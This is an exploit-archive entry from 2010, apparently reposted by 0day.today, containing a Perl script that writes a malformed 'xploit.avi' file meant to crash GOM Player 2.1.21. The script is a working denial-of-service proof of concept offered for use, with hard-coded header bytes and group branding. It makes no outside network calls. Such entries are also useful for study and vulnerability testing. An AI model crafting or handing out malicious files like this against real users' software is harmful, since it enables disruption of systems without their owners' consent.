id: 11288
date: 03/14/2010
title: GOM Player v2.1.21 avi File DoS
author: En|gma7
cves: 

===============================
GOM Player v2.1.21 avi File DoS
===============================

#!/usr/bin/perl
 
print "
[~] GOM PLAYER V 2.1.21 -last- DoS (.avi file)
[~] EN|GMA7 Team ~
[~] By Z
[~] www.enigma7.net<http://www.enigma7.net>
";
 
 
$bf = "\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00";
 
open(file, "> xploit.avi");
print (file $bf);
print "\n\n[+] Done!\n
[+] AVI file created..\n
[+] Z-at-Enigma7.net\n";



#  0day.today [2023-03-22]  #